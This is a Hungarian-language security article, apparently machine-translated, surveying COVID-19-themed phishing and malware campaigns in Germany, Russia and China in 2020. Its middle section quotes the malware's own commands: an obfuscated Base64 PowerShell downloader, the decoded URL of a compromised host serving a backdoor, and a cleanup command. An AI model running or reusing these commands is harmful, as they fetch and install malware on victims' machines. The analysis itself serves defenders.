A támadók továbbra is kihasználják a COVID-19 témát, és egyre több fenyegetést jelentenek a járvánnyal kapcsolatos minden iránt élénken érdeklődő felhasználók számára. BAN BEN Korábban már beszéltünk arról, hogy milyen típusú rosszindulatú programok jelentek meg a koronavírus nyomán, ma pedig azokról a social engineering technikákról lesz szó, amelyekkel a különböző országokban, köztük Oroszországban is találkoztak már a felhasználók. Az általános trendek és példák a vágás alatt vannak.
Emlékezz be Arról beszéltünk, hogy nem csak a koronavírusról és a járvány lefolyásáról, hanem az anyagi támogatási intézkedésekről is szívesen olvasnak az emberek? Íme egy jó példa. Érdekes adathalász támadást fedeztek fel a német Észak-Rajna-Vesztfália vagy NRW tartományban. A támadók másolatokat készítettek a Gazdasági Minisztérium honlapjáról (), ahol bárki igényelhet pénzügyi támogatást. Egy ilyen program valóban létezik, és kiderült, hogy előnyös a csalók számára. Miután megkapták áldozataik személyes adatait, a minisztérium valódi honlapján jelentkeztek, de más banki adatokat is feltüntettek. A hivatalos adatok szerint 4 ezer ilyen hamis kérés érkezett a séma felfedezéséig. Ennek eredményeként az érintett állampolgároknak szánt 109 millió dollár került csalók kezébe.
Szeretnél egy ingyenes COVID-19 tesztet?
A koronavírus-témájú adathalászat másik jelentős példája volt e-mailekben. Az üzenetek azzal hívták fel a felhasználók figyelmét, hogy ingyenes koronavírus-fertőzés szűrést ajánlottak fel. Ezek mellékletében volt példa Trickbot/Qakbot/Qbot. Amikor pedig az egészségi állapotukat ellenőrizni kívánók elkezdték „kitölteni a mellékelt űrlapot”, egy rosszindulatú szkriptet töltöttek le a számítógépre. És a sandbox tesztelés elkerülése érdekében a szkript csak egy idő után kezdte el letölteni a fő vírust, amikor a védelmi rendszerek meg voltak győződve arról, hogy nem történik rosszindulatú tevékenység.
A legtöbb felhasználót könnyű volt meggyőzni a makrók engedélyezéséről. Ehhez egy szokásos trükköt használtak: a kérdőív kitöltéséhez először engedélyezni kell a makrókat, ami azt jelenti, hogy le kell futtatni egy VBA-szkriptet.
Amint láthatja, a VBA-szkriptet kifejezetten a vírusirtókkal takarják.
A Windows rendelkezik egy várakozási funkcióval, ahol az alkalmazás megvárja a /T <másodperceket>, mielőtt elfogadná az alapértelmezett „Igen” választ. Esetünkben a szkript 65 másodpercet várt, mielőtt törölte az ideiglenes fájlokat:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
Várakozás közben pedig letöltötték a kártevőket. Ehhez egy speciális PowerShell-szkriptet indítottak:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
A Base64 érték dekódolása után a PowerShell-szkript letölti a korábban feltört webszerveren található hátsó ajtót Németországból:
http://automatischer-staubsauger.com/feature/777777.pngés elmenti a következő néven:
C:UsersPublictmpdirfile1.exe
Mappa ‘C:UsersPublictmpdir’ törlődik a parancsot tartalmazó „tmps1.bat” fájl futtatásakor cmd /c mkdir ""C:UsersPublictmpdir"".
Célzott támadás a kormányhivatalok ellen
Ezenkívül a FireEye elemzői a közelmúltban egy célzott APT32 támadásról számoltak be, amelyet Vuhan kormányzati struktúrái, valamint a kínai veszélyhelyzet-kezelési minisztérium ellen irányoztak. Az egyik terjesztett RTF tartalmazott egy hivatkozást a New York Times című cikkére . Az olvasás során azonban rosszindulatú program letöltésre került (a FireEye elemzői METALJACK-ként azonosították a példányt).
Érdekes módon az észlelés időpontjában egyik vírusirtó sem észlelte ezt a példányt a Virustotal szerint.
Amikor a hivatalos weboldalak nem működnek
Az adathalász támadás legszembetűnőbb példája éppen a napokban történt Oroszországban. Ennek oka a régóta várt ellátás kijelölése volt a 3 és 16 év közötti gyermekek számára. Amikor 12. május 2020-én bejelentették a jelentkezések fogadásának kezdetét, milliók siettek az Állami Szolgálatok oldalára a várva várt segítségért, és semmivel sem rombolták le a portált, mint egy profi DDoS támadás. Amikor az elnök azt mondta, hogy „a kormányzati szolgálatok nem tudnak megbirkózni a jelentkezések áramlásával”, az emberek elkezdtek beszélni az interneten egy alternatív pályázatfogadási oldal indításáról.
A probléma az, hogy több webhely kezdett el egyszerre működni, és míg az egyik, az igazi a posobie16.gosuslugi.ru címen valóban elfogadja a jelentkezéseket, .
A SearchInform munkatársai körülbelül 30 új csaló domaint találtak a .ru zónában. Az Infosecurity és a Softline Company április eleje óta több mint 70 hasonló hamis kormányzati szolgáltatási webhelyet követett nyomon. Alkotóik az ismert szimbólumokat manipulálják, és a gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie és így tovább szavak kombinációit is használják.
Hype és social engineering
Mindezek a példák csak megerősítik, hogy a támadók sikeresen bevételt szereznek a koronavírus témájával. Minél nagyobb a társadalmi feszültség és minél több a tisztázatlan kérdés, annál nagyobb az esélye a csalóknak, hogy fontos adatokat lopjanak el, az embereket arra kényszerítsék, hogy önmaguktól adjanak le pénzüket, vagy egyszerűen több számítógépet törjenek fel.
És tekintettel arra, hogy a járvány miatt a potenciálisan felkészületlen emberek tömegesen otthonról dolgozzanak, nemcsak a személyes, hanem a vállalati adatok is veszélyben vannak. Például a közelmúltban a Microsoft 365 (korábban Office 365) felhasználókat is adathalász támadás érte. Az emberek hatalmas „elmulasztott” hangüzeneteket kaptak levelek mellékleteként. A fájlok azonban valójában egy HTML-oldal volt, amelyre a támadás áldozatait küldték . Ennek eredményeként a hozzáférés elvesztése és a fiókból származó összes adat veszélyeztetése.
Forrás: will.com